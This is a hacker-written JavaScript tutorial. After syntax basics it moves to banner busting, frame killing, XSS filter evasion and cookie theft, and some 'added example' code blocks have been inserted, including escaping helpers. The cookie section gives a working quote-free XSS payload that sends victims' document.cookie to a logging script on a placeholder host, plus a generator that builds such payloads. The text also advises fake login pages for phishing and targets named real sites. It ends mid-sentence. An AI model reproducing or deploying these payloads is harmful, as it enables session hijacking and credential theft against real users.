Hacking With Javascript
Written by b0iler for http://b0iler.eyeonsecurity.net
-things to come: example of stealing info from users (anti-virus
programs and trojans), story of ciru cookie stealing from
acanium, ThePull's javascript exploits, and the about://
exploit. Since so many people were asking when this tutorial
would come out I decided to finally put it up. I'd appreciate
some feedback. Flames without a reason are not welcome.
This tutorial is not completely finished.. and probably
never will be :(
-idea: cross site scripting by opening a new page in
a frame and then writing to form fields or somehow injecting
javascript. Or somehow write the html to the top or bottom.
Intro
Javascript is used as a client side scripting language,
meaning that your browser is what interprets it. It is
used on webpages and is secure (for the most part) since
it cannot read or write files on your hard drive (the
closest it gets is the cookies for the current site, through
document.cookie). It also cannot read/write any files on the
server. Knowing javascript can help you in both creating
dynamic webpages, meaning webpages that change, and hacking.
First I will start with the basic javascript syntax, then
I will list a few sites where you can learn more, and
then I will list a few ways you can use javascript to
hack.
There are a few benefits of knowing javascript. For starters,
it is really the only (fully supported) language that
you can use on a website, making it a very popular language
on the net. It is very easy to learn and shares common
syntax with many other languages. And it is completely
open: if you find something you like done in javascript
you can simply view the source of the page and figure
out how it's done. The reason I first got into javascript
was because back before I got into hacking I wanted to
make my own webpage. I learned HTML very quickly and
saw Dynamic HTML (DHTML) mentioned in a few tutorials.
I then ventured into the land of javascript, making simple
scripts and useful features for my site.
It was only after I was pretty good with javascript and
got into hacking that I slowly saw its potential to be
used maliciously. Many javascript techniques are pretty
simple and involve tricking the user into doing something.
Almost pure social engineering with a bit of help from
javascript. After using simple javascript tricks to fake
login pages for web based email I thought about other ways
javascript could be used to aid my hacking, and I studied
it on and off for around a year. Some of these techniques
are used by millions of people, some I came up with and
are purely theoretical. I hope you will realize how
much javascript can aid a hacker.
1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion
1. Basic Syntax
The basics of javascript are fairly easy if you have programmed
anything before. Javascript is not java, but if you
know java you should have no problems learning it. Same
for any other programming language, as most share the
same basics that javascript uses. This tutorial might not
be for the complete newbie. I would like to be able to
do a tutorial like that, but I don't have the time or
patience to write one. To begin, if you don't know html
you must learn it first!
Javascript starts with the tag <script type="text/javascript">
(older pages use <script language="javascript">, which also works)
and ends with </script>. Anything between these
two tags is interpreted as javascript by the browser.
Remember this! A few hacks use the fact that if
you open a <script> tag and don't close it, all the html
on the page underneath it is swallowed as script and never
rendered. Don't write <script type="javascript">: that
is not a valid type, and a browser that checks the type
attribute will not execute the block at all. I would
also like to mention that many scripts have <!-- right
after the <script type="text/javascript"> tag and
//--> right before the </script> tag. This is
to keep the script from showing up as text in old
browsers that do not support javascript. Either
way is fine, but I will be using the <!-- and //-->
because that is how I learned to script and I got used
to putting it in.
Javascript uses the same basic elements as other programming
languages, such as variables, flow control, and functions.
The only difference is that javascript is a lot more simplified,
so anyone with some programming experience can learn javascript
very quickly. The hardest part of scripting javascript
is to get it to work in all browsers. I will now go over
the basics of variables:
to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';
A variable is basically the same in all programming languages.
I might also point out that javascript does not support
pointers. No structs to make your own types either.
There is only one way to declare a variable, 'var', and
you never say what type it holds: the type comes from the
value you assign, and the same variable can hold a number
one moment and a string the next. This can be
a hard thing to understand at first if you come from C or
C++, where every variable has a fixed type.
A string is a group of characters, like: 'word', which
is a string. When you see something like document.write(something);
it will try to print whatever is in the variable something.
If you do document.write('something'); or document.write("something");
it will print the string 'something'. Now that you got
the variables down lets see how to use arithmetic operators.
This will make 2 variables and add them together to make
a new word:
<script type="text/javascript">
<!--
var name = 'b0iler';
var adjective = 'owns';
document.write(name+adjective);
//-->
</script>
First we define the variable 'name' as b0iler, then
'adjective' as owns. Then the document.write()
function writes it to the page as 'name'+'adjective', or
b0ilerowns. If we wanted a space we could have done
document.write(name+' '+adjective);
Escaping characters - This is an important concept in
programming, and extremely important in secure programming.
It matters just as much in javascript as in any server side
language: sections 4 and 5 of this tutorial are all about
what happens when a site prints user input into a page
without escaping it. So what is "escaping"? It is putting a \
in front of certain characters, such as ' and " (and \
itself, which you write as \\). If we
wanted to print out:
b0iler's website
We couldn't do:
document.write('b0iler's website');
because the browser would read b0iler and see the ' then
stop the string. We need to add a \ before the ' so that
the browser knows to print ' and not interpret it as the
ending ' of the string. So here is how we could print
it:
document.write('b0iler\'s website');
There are two types of comments in javascript. // which
only lasts till the end of the line, and /* which goes
as far as possible until it reaches */. I'll demonstrate:
<script type="text/javascript">
<!--
document.write('this will show up'); // this will not, even document.write('blah'); won't
/* document.write('this also will not show up');
this won't either. document.write('or this');
it is all in the comments.. which aren't rendered by the
browser */
//-->
</script>
The only thing that script will do is print "this will
show up". Everything else is in comments which are not
run as javascript by the browser.
Flow Control is basically changing what the program does
depending on whether something is true or not. Again,
if you have had any previous programming experience this
is old stuff. You can do this a few different ways.
The simplest is the if-then-else statement. Here
is an example:
<script type="text/javascript">
<!--
var name = 'b0iler';
if (name == 'b0iler') { document.write('b0iler is a really cool guy!'); }
else { document.write('b0iler can not define variables worth a hoot!'); }
//-->
</script>
Lets break this down step by step. First I create the
variable 'name' and define it as b0iler. Then I check
if 'name' is equal to "b0iler"; if it is then I write 'b0iler
is a really cool guy!', else (if name isn't equal to b0iler)
it prints 'b0iler can not define variables worth a hoot!'.
You will notice that I put { and } around the actions
after the if and else statements. You do this so that
javascript knows how much to do when it is true. When
I say true think of it this way:
if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'
if the statement name == 'b0iler' is false (name does
not equal 'b0iler') then whatever is in the {} (curly
brackets) is skipped.
We now run into relational and equality operators. The
relational operators are as follows:
> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is less than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to the right it is true.
<= - Less than or equal to. If the left is less than or equal to the right it is true.
So lets run through a quick example of this. In this example
the variable 'lower' is set to 1 and the variable 'higher'
is set to 10. If lower is less than higher then we add
10 to lower, otherwise we messed up assigning the variables
(or with the if statement).
<script type="text/javascript">
<!--
var lower = 1;
var higher = 10;
if (lower < higher) { lower = lower + 10; } // we could have used lower += 10;
document.write('lower should be greater than higher.. or else I messed up.');
document.write('lower:'+lower+' and higher:'+higher);
//-->
</script>
And now the equality operators. You have already seen
one of them in an example: if (name == 'b0iler'). The equality
operators are == for "equal to" and != for "not equal
to". Make sure you always put two equal signs (==) because
if you put only one (=) then it will not check for equality,
it will assign the right side to the variable and the if
will test the assigned value instead.
This is a common mistake that is often overlooked.
Now we will get into loops. Loops repeat the statements
in between the curly brackets {} until the condition is no longer
true. There are 2 main types of loops I will cover: while
and for loops. Here is an example of a while loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
var namenumber = 1;
while (namenumber < 5) {
name = name + name; // could have used: name += name;
document.write(name);
namenumber = namenumber + 1;
}
//-->
</script>
First 'name' is set to b0iler, then 'namenumber' is set
to 1. Here is where we hit the loop, it is a while loop.
What happens is while namenumber is less than 5 it does
the following 3 commands inside the brackets {}: name
= name + name; document.write(name); namenumber =
namenumber + 1; The first statement doubles the length
of 'name' by adding itself on to itself. The second statement
prints 'name'. And the third statement increases 'namenumber'
by 1. So since 'namenumber' goes up 1 each time through
the loop, the loop will go through 4 times. After the
4th time 'namenumber' will be 5, so the statement namenumber
< 5 will no longer be true.
Let me quickly go over some short cuts to standard math
operators, these shortcuts are:
variable++; // adds 1 to variable.
variable--; // subtracts 1 from variable.
variable+= something; // adds something to variable.
Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3; // subtracts 3 from variable
variable*= 2; // multiplies variable by 2.
Next loop is the for loop. This loop is unique in that
it (defines a variable; then checks if a condition is
true; and finally changes a variable after each time through
the loop). For the example lets say you want to do the
same thing as above. This is how you would do it with
a for loop:
<script type="text/javascript">
<!--
var name = 'b0iler';
for (var namenumber = 1; namenumber < 5; namenumber++) {
name += name; // this is the same as before: name = name + name;
document.write(name);
}
//-->
</script>
First the variable name is defined, then it starts the
for loop. It assigns 1 to namenumber, then checks if
namenumber is less than 5 every time through the loop,
and it increases namenumber by 1 every time through the
loop (variablename++ means increase the variable by 1).
The next 2 lines are the same as with the while loop.
But since the for loop handles the declaration of namenumber
and the increase every time through the loop it makes
it simpler for the scripter and easier to keep track of
for people trying to read the code. You can use a while
loop if you want, it is all up to the scripter's preference.
Lets go over that for loop one more time, just for clarity.
for (done only the first time; loop continues while this
is true; done after every time through the loop)
That's it for learning javascript, this was really basic
and pretty much covered things that are constant in most
languages. For javascript specific guides check out the
next section of the tutorial. This section was only to
give the user enough info to understand the rest of the
tutorial. I wish I could go over more, but there are
way better tutorials for advanced javascript than one
I could ever write.
2. Places To Learn More Advanced Javascript
I will just provide a list of tutorials and sites with
more advanced javascript. If you wish to learn javascript
and be able to write your own you will have to look at
other people's scripts for examples and read a few more
tutorials. I just went over the very basics so you wouldn't
be lost.
http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial2.html
- good examples, not really advanced.. probably a medium
level javascript tutorial.
http://www.webdevelopersjournal.com/articles/jsevents2/jsevents2.html
- A javascript tutorial on event handlers. Fairly advanced.
http://www.htmlguru.com
- a classic site, go to the tutorials section and
learn a lot of advanced javascript made easy.
http://server1.wsabstract.com/javatutors
- Goes over some specific aspects of advanced javascript
work. Useful in many situations.
http://www.pageresource.com/jscript/index6.htm
- The advanced string handling and the forms tutorials
are good, I would suggest reading them if you wish to
get more into javascripting.
Coolnerd's Javascript Resource
- A nice list of all the javascript
operators, statements, objects.. although it might be
a little old I still use it all the time.
If you want to create your own javascripts for your site
be warned. Javascripts are very limited in power, but
can be the solution to many simple problems. You will
have to spend a few weeks learning more advanced javascript
in order to make anything really useful. Creating that
awesome DHTML (Dynamic HTML) feels really good ;) Dynamic
HTML is pretty much javascript that interacts with the
user, css, and layers - <div>, <span>, and
<layer>.
Here are some links to good dynamic html sites:
The Dynamic Duo, Cross browser dynamic html tutorial
- Goes over things step by step.
Taylor's dynamic HTML tutorial
- That nice webmonkey style that everyone loves.
Curious Eye DHTML tutorial
- This will really get you going making cross browser Dynamic HTML.
Intro to DHTML
- Might be nice if you aren't as html and
javascript knowledgeable as most DHTML beginners.
Good luck with your adventure into javascript =)
3. Banner Busting & Killing Frames
I call it banner busting. It is when you use javascript
(or other tags) that aren't rendered by the browser the
same as normal html tags to get around a popup or banner
that free sites automatically put on your page. The basic
idea of this is to have a tag that isn't rendered as html
right before the html the site adds for their banner, so
that users' browsers do not see the banner. There is
really only one key thing you need to find out in order
to kill that banner: what tag the site uses as
a "key". What I mean by this is what tag does the banner
they add come before or after? Try putting up a page
with just:
<html> <!-- blah -->
<body> <!-- blah -->
text <!-- blah --> </body>
<!-- blah --> </html>
Now upload that page and view it in a browser. View the
source of the page and find where the site added its
banner html. If it came after the <html> and before
the <body> then you need to see if it came before
or after the <!-- blah --> which is in between those.
If it is before, then it is the <html> tag that
is the key tag which the site adds its banner after.
If it is under the <!-- blah --> then you know it
puts it after the <body> tag.
So now that we know where the site adds its banner html,
what do we do to stop it? We make a "fake" key tag
and hopefully the site adds its banner html to the fake
one instead. Then we use javascript, or a tag the browser
does not treat as html, to put the real one in. We can
do a few things, here is the list:
- the basic <noscript> - this used to work,
as most banners or popups start with some javascript,
but now free sites have gotten smart and automatically
add a </noscript> to stop it.
<noscript>
<keytag> -this keytag is the decoy.
Before/after this tag is where the banner would be.
</noscript>
<keytag> -this keytag is the real one.
- <script> , <style> , <xml> - these
are a few examples of tags that will make the html
and javascript the site adds for its banner not render
in the browser. Since it is not in the syntax of
css, xml or javascript (it is html) users' browsers
will just ignore it. (With <script> as the wrapper,
be aware that a </script> inside the ad closes your
wrapper early and the rest of the ad renders, so
<style> is usually the safer choice.)
<style>
<keytag> -this keytag is the decoy.
Before/after this tag is where the banner would be.
</style>
<keytag> -this keytag is the real one.
- printing tags with javascript - this one was thought
up by acecww and works really well. If you are having
problems when you put in the real keytag then try using
javascript so the site doesn't even see it as the
keytag. You get javascript to print the tag one
letter at a time.
<script type="text/javascript">
<!--
document.write('<'+'k'+'e'+'y'+'t'+'a'+'g'+'>');
//-->
</script>
<style>
<keytag> -this keytag is the decoy.
Before/after this tag is where the banner would be.
</style>
If all worked out you should have a page with no annoying
popups or flashing banners. If not I guess you will have
to play around a little and figure it out for yourself.
Since every free host uses different keytags and methods
of adding its banner I can't go over them all one by
one.
I decided to go over a real example of a free site that
adds popup ads or banners to every page you have. I'll
be using angelfire since I hate them and because that's
the one I picked out of my lucky hat. Just remember that
sites can change the way they add banners anytime they
feel like, so this method might not work the same way
as I am showing. Doing this also breaks the TOS (Terms
Of Service) with your host, so you might get your site
taken down without any warning. Always have complete
backups of your site on your hard drive, especially if
you have a hacking site or are breaking the TOS.
angelfire
------------------------
begin
------------------------
<html>
<head>
<title>testing</title>
</head>
<body>
<!-- Beginning of Angelfire Ad Code Insertion -->
</noscript>
<script language="JavaScript">
<!--
(this is where the angelfire ad script would be.)
//-->
</script>
<!-- End of Angelfire Ad Code Insertion -->
<p> rest of test page</p>
</body>
</html>
------------------------
end
------------------------
As you can see angelfire puts their ad right after the
<body> tag. All they are using to protect us from
getting rid of the ad is a </noscript>, so we can
put something like this to defeat the ad:
<style>
<body>
</style>
<body>
So angelfire's server will add the javascript for their
advertisement after the first <body> they see. That
will put the ad after <style><body> and before
</style>. This means that users' browsers will
think that <body> and the angelfire ad is css (cascading
style sheet).. which is the <style> tag. Since
javascript and html cannot be in css the browser ignores
it. We then put the real <body> after this and
continue with our site.
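Here is the whole procedure (probe for the key tag, then hide it in a decoy) as a small simulation you can run offline. This is an added example and not part of b0iler's tutorial; the host's insertion step and its ad code are constructed stand-ins modelled on the angelfire output above, and real hosts differ and change without notice.

```javascript
// Added example, not from the original tutorial: simulate a free host that
// inserts its ad right after the first <body> tag, and show why the
// <style><body></style><body> decoy keeps the ad out of the rendered page.
// AD is a constructed placeholder for the host's ad html.
const AD = '<!-- ad --><script>/* ad code would be here */</script>';

// What the host does to every page it serves: insert the ad right after
// the first <body ...> tag it finds, case-insensitively.
function hostInsertAd(page) {
  return page.replace(/<body[^>]*>/i, (tag) => tag + AD);
}

// Step one of the technique: find the "key" tag. Compare what you uploaded
// with what the host served; the ad starts where the two first differ, and
// the key tag is the last tag before that point.
function findKeyTag(uploaded, served) {
  let i = 0;
  while (i < uploaded.length && uploaded[i] === served[i]) i++;
  const tags = uploaded.slice(0, i).match(/<[^<>]+>/g);
  return tags ? tags[tags.length - 1] : null;
}

// Step two: wrap a decoy copy of the key tag in <style>...</style> so the
// host's insertion lands inside css, then follow it with the real tag.
function withDecoy(page, keyTag) {
  return page.replace(keyTag, '<style>' + keyTag + '</style>' + keyTag);
}

// A browser renders nothing inside <style> as html, so strip those blocks
// to see what the user actually gets. Not a real html parser, but enough
// for the constructed pages here.
function renderedHtml(served) {
  return served.replace(/<style>[\s\S]*?<\/style>/gi, '');
}

function adIsVisible(served) {
  return renderedHtml(served).includes(AD);
}

// Constructed probe page, like the one in the text.
const PROBE = '<html> <!-- blah -->\n<body> <!-- blah -->\ntext <!-- blah --> </body>\n<!-- blah --> </html>';
```

findKeyTag(PROBE, hostInsertAd(PROBE)) reports <body> as the key tag, and adIsVisible(hostInsertAd(withDecoy(PROBE, '<body>'))) is false while the real <body> is still in the rendered output. The same diff-then-wrap idea works for any host as long as you can see exactly where its html lands.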
About a month after I wrote this I came up with an idea
of how to completely remove the advertisements sites put
on your pages. I am not 100% sure it will work, but the
basic idea is to have a cgi script open all the .html
pages in your directory, remove the ad, and write the
html back to the .html files. A few things might affect
how well this works. First, if the script that adds the
ad to the .html files is a cron job, but I doubt this,
since it would put heavy strain on the system to search
and write to all those files. Second, the script might
be run whenever a .html file is edited; I am hoping that
it is only run when a file is created or uploaded.
I'll test this out someday, if you want this script come
bother me on irc about it and I might finish it =)
Killing Frames
Now I'll go over how to kill frames. The reason you would
need this script is to hack namezero, nbci, and other
companies which put your page in a frame. Killing a frame
means to get rid of it so that your site is the one filling
the whole window.
There is one solid way which has always worked for doing
this. Not only will it bust out of companies' frames..
But if some lamer is leeching your site by using frames
this will stop them. The script is as follows:
<script type="text/javascript">
<!--
if (self != top) top.location.replace(self.location);
//-->
</script>
What this script does is check if the current page is
not the top (first) frame; if it isn't then it puts itself
as the top frame, deleting the other frame from the browser
window. replace() is used rather than assigning to
top.location so the framed version does not stay in the
browser's history. Pretty handy trick =)
Lets say we are entering info to a guestbook. This would
be put on the main page of the guestbook. And whenever
anyone visited that page we want them to be sent to http://www.lameindustries.org.
We would enter this in the guestbook:
<script type="text/javascript">
<!--
document.location = 'http://www.lameindustries.org';
//-->
</script>
4. Getting Past Scripts That Filter Javascript
Sometimes when you want to use javascript there is some
form of filtering going on that stops the <script>
tag from being rendered as usual. For those of you who
know perl I will demonstrate.
[Line from a perl script that filters input for the <script>
tag] $input =~ s/<script/&lt;script/ig;
$input is what you submitted to the perl script. What
it is doing is looking for <script in your input (in any
mix of upper and lower case) and replacing the < with &lt;,
so the browser shows the tag as text instead of running it.
So how do you get around this? The old trick is to write
some of the characters in <script type="text/javascript">
as character references, so the regular expression no longer
matches. The only characters you cannot do this for are
the < and the >, because they would not be treated as a tag
by the browser if you did. So you would enter something like
this into the guestbook (the s is written as &#x73;):
<&#x73;cript type="text/javascript">
<!--
document.location = 'http://www.lameindustries.org';
//-->
</script>
This gets past the filter, but be warned that it does not
get past the browser: browsers do not decode character
references inside a tag name, so <&#x73;cript> is not a
script tag to them either. Character references only help
where the browser does decode them, which is inside attribute
values, for example a javascript: url in an href or the
code in an onclick handler. The more reliable way around a
filter that only looks for <script is to not use a <script>
tag at all: any tag that takes an event handler attribute
(onload, onerror, onmouseover..) runs javascript too, and so
does the <link> stylesheet trick covered later in this section.
How did I know what the hex value of 's' was? I just
checked an ascii chart and put &#x before it and ;
after it. You can use this in the url of your browser
as well, just put % before the number. An ascii
chart is available at www.lameindustries.org/tutorials/tutorials/wtf_is_hex.shtml
or man ascii if you run *nix.
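To make the escaping point concrete, here is the perl filter above rewritten in javascript, next to a quotes-only escape like the one the neworder script in section 5 turns out to use, and next to the escaping that actually stops injected script (the same "b0iler's website" problem from the syntax section, done properly). This is an added example and not code from the tutorial; the sample guestbook posts are constructed and http://evil/ is a placeholder.

```javascript
// Added example, not from the original tutorial. Constructed inputs;
// "http://evil/" is a placeholder address.

// The perl line  $input =~ s/<script/&lt;script/ig;  as javascript:
// only the literal "<script" is touched, case-insensitively.
function naiveFilter(input) {
  return input.replace(/<script/gi, '&lt;script');
}

// Escaping only ' " and \ (addslashes style). Forces the attacker to build
// strings with String.fromCharCode, but leaves < and > alone.
function quotesOnlyEscape(input) {
  return input.replace(/['"\\]/g, (c) => '\\' + c);
}

// Escaping untrusted text for an html page: every character that can open
// a tag, start an entity, or end an attribute value becomes a reference.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Escaping a value placed inside a javascript string literal: the backslash
// before quotes from the syntax section, plus what that alone misses: the
// backslash itself, line breaks, and "</" (a </script> inside a string
// literal still ends the script block in html).
function escapeJsString(input) {
  const map = { '\\': '\\\\', "'": "\\'", '"': '\\"', '\n': '\\n', '\r': '\\r',
                '\u2028': '\\u2028', '\u2029': '\\u2029' };
  return input.replace(/[\\'"\n\r\u2028\u2029]/g, (c) => map[c]).replace(/<\//g, '<\\/');
}

// Rough check of whether html still contains something a browser would run:
// a real <script tag or an on*= event handler attribute. Not a parser, but
// enough for the constructed inputs below.
function looksExecutable(html) {
  return /<script[\s>]/i.test(html) || /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed guestbook posts.
const samples = {
  plainScript: '<script>document.location="http://evil/";</script>',
  // the "hex value of s" trick: gets past the regex, but is not a tag either
  entityInTagName: '<&#x73;cript>alert(1)</script>',
  // no <script at all, so the filter never sees it, yet it runs
  eventHandler: '<img src=x onerror="document.location=\'http://evil/\'">',
  // what a quotes-only escape leaves alone: still a script tag
  quoteFree: '</pre><script>document.location.replace(String.fromCharCode(104,116,116,112))</script>',
};
```

Run the samples through naiveFilter and quotesOnlyEscape and check them with looksExecutable: the plain <script> is caught, the entity trick passes the regex but is not executable anyway, the event handler and the quote-free payload pass untouched and still run. escapeHtml neutralises all four, and escapeJsString round-trips a string containing quotes, a newline and </script> through a single-quoted literal.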
There are a few other situations where javascript can
be useful. If you can get around the filter on a user's
web based email you can use your email spoofing skills to send an
email from someone they trust. If they open it you can
have the email redirect them to a page which says something
like "session timed out, please log in again" and have
that form submitted to a cgi script that logs it. This
works for a small percentage of people, but it is worth
a shot sometimes.
Getting by javascript filters can lead to you getting
cookies for such things as forums, shopping carts, sites,
and redirecting users to the site of your choice. Anywhere
there is input that is displayed on a page which other
people may visit (or you can make them visit) there is
an opportunity to use javascript to steal information.
In fact just today as I am writing this it was found that
lycos and other search engines are vulnerable to javascript
in websites' descriptions and names, read the
slashdot story for more info. This could lead to
100% clicks for any search your site turns up on ;).
Here is a cert advisory concerning insertion of scripts
(javascript, vbscript, etc..) into input that gets printed back out:
http://www.cert.org/advisories/CA-2000-02.html
update: there has been a new advisory for hotmail and
other sites which filter javascript. The problem lies
in css and the use of the <link> tag. When the
following code is used the linked javascript will be executed,
making it possible to steal cookies, info, or redirect
users to a fake login page.
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="script.js">
Put that in the body, preferably as the first thing.
Of course hotmail patched it days after it was reported,
but it goes to show that hotmail is not 100% secure and
there will still be ways in the future to get scripting
executed. Also other web based email, guestbooks, message
boards, etc.. might be vulnerable to this. You can use
old hotmail exploits on many other scripts that allow
input and print it to a .html file. I found this vulnerability
in a script that cyberarmy.com ran for their web based
mail, I just put in a <script> tag
and redirected the user to a fake login page. When they
logged in with their user and password it sent them to
a script that wrote their info to a database and then
logged them into the web based email script again. The
script was made by solutionscripts, and cyberarmy is no
longer vulnerable.
Also note that normal text field input is not the only
way to insert data into a script. Hidden fields and environment
variables are also sometimes vulnerable. Some scripts
will filter all the text fields, but will not filter the
hidden fields; this allows you to insert javascript or
other nasty things. I won't go too much into that since
it would require a whole other tutorial and because writing
javascript isn't the first thing you would try to exploit
with that. Environment variables that you can exploit
are usually Referer or User-Agent, since those tend to
be the only ones ever written to a file, and they are also
the least filtered input in my experience. It's much
easier to find ways to insert javascript if you can get
hold of the source of the script. There are two easy
ways to do this: the first is to see if the script is
open source, then go download and review the code for
holes. The other is to look for other scripts/exploits
that allow you to view the source of other scripts. So
do some research for other exploits in other scripts (or
the webserver itself).
5. Stealing Cookies
note: to do this you'll need a little bit of advanced
javascript knowledge, and some perl/php/asp (or other
server side language).
Stealing cookies can be a dangerous problem for many sites.
It all depends on how the site sets up its security.
If a site just uses the cookie to identify users (no login
every visit) then it could be vulnerable. If you have to
log in every time and the cookie holds nothing that gets
you past the login, then it is almost useless to try and
steal cookies, unless of course the username and password
are stored in the cookie and are not encrypted. Bear in
mind that a session id in a cookie is as good as the
password for as long as that session lasts, even though
the password itself is not in there. Sometimes you are
allowed access without logging in. We will pick on
http://neworder.box.sk since
they stole some LI tutorials, even though they are not
vuln to this because you must login to their site and
the user password is not in the cookie. (Lets see if
they steal a tutorial which explains how to exploit a
hole in one of their scripts ;) How we will be exploiting
this bug is simple. Luckily cube left us a vulnerable
script on the site to play with. The script is http://neworder.box.sk/box.php3?prj=neworder&newonly=1&gfx=neworder&txt=what's+new.
What is vuln about this script? It doesn't escape the
inputted characters that are printed to the page. I told
you escaping characters is important. The script instead
relies on a simple <pre> tag to stop javascript.
So the first thing we must do is test and see what characters
(if any) are left unescaped for us to use. After a check
for these characters: ' " ; | < > / and % we find
that he does escape ' and ". If he didn't we could exploit
the php script itself and have total control over the
site. I will get to a little trick in a second where
we can get javascript to print out ' and ". But for now
we must stop that <pre> tag. So we end it with
a </pre> then insert any javascript we would like.
In the first paragraph I said that javascript is mostly
secure, because it cannot read or write any files off
a users hard drive besides cookies. Here we will use
javascript to read the user's cookie for neworder and
then use javascript to send them to a cgi script where
we log their cookie to a txt file. After this we check
the log from the cgi script and save the cookie where
our browser keeps them. Or we can get the username and
password from the cookie and login to the site (neworder
doesn't keep the user's password in the cookie).
So now to print the javascript that will steal the cookie.
What we are doing is using the script that prints out
unescaped characters to the page as if it was javascript
that was really on that website. So we can view and edit
user cookies. There are two main problems we must overcome.
First we need to print a string without using ' and "
since the .php script on neworder does escape those characters.
How we do this is by using javascript which doesn't need
' or " and prints out any character. This is one way
to do it:
<script type=text/javascript>
<!--
var u = String.fromCharCode(0x0068);
u += String.fromCharCode(0x0074);
u += String.fromCharCode(0x0074);
u += String.fromCharCode(0x0070);
u += String.fromCharCode(0x003A);
u += String.fromCharCode(0x002F);
u += String.fromCharCode(0x002F);
u += String.fromCharCode(0x0073);
u += String.fromCharCode(0x0069);
u += String.fromCharCode(0x0074);
u += String.fromCharCode(0x0065);
u += String.fromCharCode(0x002E);
u += String.fromCharCode(0x0063);
u += String.fromCharCode(0x006F);
u += String.fromCharCode(0x006D);
u += String.fromCharCode(0x002F);
u += String.fromCharCode(0x0061);
u += String.fromCharCode(0x002E);
u += String.fromCharCode(0x0063);
u += String.fromCharCode(0x0067);
u += String.fromCharCode(0x0069);
u += String.fromCharCode(0x003F);
u += document.cookie;
document.location.replace(u);
//-->
</script>
When this goes into the url every + must be written as %2B,
because a + in a query string becomes a space by the time
it reaches the script. There is probably an easier
way of doing this besides using fromCharCode, but I couldn't
think of any =) (It can at least be shortened: fromCharCode
takes any number of codes in one call, so
String.fromCharCode(0x68,0x74,0x74,0x70) is 'http'.) The
0x0068 is ascii for h. 74 is t..
(You can get an ascii chart from http://www.elfqrin.com/docs/hakref/ascii_table.html
):
68=h 74=t 74=t 70=p 3A=: 2F=/ 2F=/ 73=s 69=i 74=t 65=e
2E=. 63=c 6F=o 6D=m 2F=/ 61=a 2E=. 63=c 67=g 69=i 3F=?
In other words it makes the var u equal to the string
http://site.com/a.cgi?
All right, so we got a string in a variable without using
' or ". var u = 'http://site.com/a.cgi?'; would be the
same thing if the script didn't filter for ' and ". So
now that we got the string going what should we do? Well
what we are trying to do is get the cookie in a string
and then send them to a cgi script that logs what's in
the cookie. document.cookie holds all the cookies for that
site, as name=value pairs separated by semicolons.
If there is more than one cookie then you have to use
a little trickery on the logging end to split them up.
Now we need to add the cookie to the end of the url.
So:
u += document.cookie;
Wham! Our var u is now: http://site.com/a.cgi?user_s_cookie
(but user_s_cookie is actually the value in their cookie).
So now we make javascript redirect them to that url.
document.location.replace(u);
This will send them to our var u, where a.cgi will be
a cgi script that just logs whatever is inputted to it
into a database. Another way to log their cookie would
be to have the script request an image whose url carries
the cookie (the image doesn't have to exist), something like:
document.write('<img src="http://site.com/somedir/'+document.cookie+'">');
But since this script filters ' and " it would be a really
long url to put fromCharCode's for every character.. Also,
you would have to have access to the logs of the site
in order to check what files were requested from the 'somedir'
directory.
All cookie stealing techniques require some kind of script
on your website to log the cookie when it is sent as a
url.
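The hand-written chain of fromCharCode lines above can be generated, and the whole exchange (injected script on the victim's side, the logging script on yours) can be checked offline. This is an added example, not part of b0iler's tutorial: http://site.com/a.cgi? is the tutorial's placeholder logging url, the fake document object stands in for the victim's browser, and the cookie values are constructed.

```javascript
// Added example, not from the original tutorial. The fake document object
// and the cookie values below are constructed; http://site.com/a.cgi? is
// the placeholder logging url from the text.

// Emit a javascript expression that evaluates to `s` with no ' or " in it.
// fromCharCode accepts any number of code units, so one call replaces the
// whole chain of  u += String.fromCharCode(0x..)  lines.
function fromCharCodePayload(s) {
  const codes = Array.from(s, (c) => c.charCodeAt(0));
  return 'String.fromCharCode(' + codes.join(',') + ')';
}

// The body of the injected <script> block: redirect to logUrl + cookie.
function stealCookieScript(logUrl) {
  return 'document.location.replace(' + fromCharCodePayload(logUrl) + '+document.cookie)';
}

// When the script travels inside a url parameter every + must become %2B
// (a bare + is decoded as a space), and other specials must be encoded too.
function asQueryValue(js) {
  return encodeURIComponent(js);
}

// Run the injected script against a stand-in for the victim's page and
// return the url the browser would be sent to.
function simulateVictim(script, cookieHeader) {
  const fakeDocument = {
    cookie: cookieHeader,
    location: { href: null, replace(url) { this.href = url; } },
  };
  new Function('document', script)(fakeDocument);
  return fakeDocument.location.href;
}

// What a.cgi receives: everything after the ?, which is document.cookie as
// the browser formats it (name=value pairs separated by "; "). Split it up:
// this is the "more than one cookie" case.
function parseCookieString(cookieString) {
  const cookies = {};
  for (const part of cookieString.split(';')) {
    const eq = part.indexOf('=');
    if (eq < 0) continue;
    cookies[part.slice(0, eq).trim()] = decodeURIComponent(part.slice(eq + 1).trim());
  }
  return cookies;
}

// Whole flow with a constructed two-cookie session.
function demo() {
  const logUrl = 'http://site.com/a.cgi?';
  const script = stealCookieScript(logUrl);
  const sentTo = simulateVictim(script, 'user=b0iler; session=abc123');
  return { script, query: asQueryValue(script), sentTo,
           logged: parseCookieString(sentTo.slice(logUrl.length)) };
}
```

demo() returns the generated script, its url-encoded form (with the + written as %2B), the url the victim is redirected to, and the cookies the logging script recovers from it. Anything that builds strings from character codes like this is also a cheap thing to look for when you are on the other side reviewing input that reaches a page.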
Once you have a user's cookie there are 2 things it can
be used for. Sometimes sites put their username and password
right in the cookie. In this case you can just log into
the site with that. Some other sites just simply use
a cookie to authenticate users. No login required.
Take for example www.geocities.com
.. If you request a file that doesn't exist, the 404 page
prints the url you asked for back into the page.
Now if you have a cookie of a geocities member you can
go to www.geocities.com and you will automatically be
logged in. From there you have full control over their
account.
But geocities did do something to stop this. They have
their website go to http://geocities.yahoo.com .. So the
cookie for users is actually a yahoo cookie ;( If you
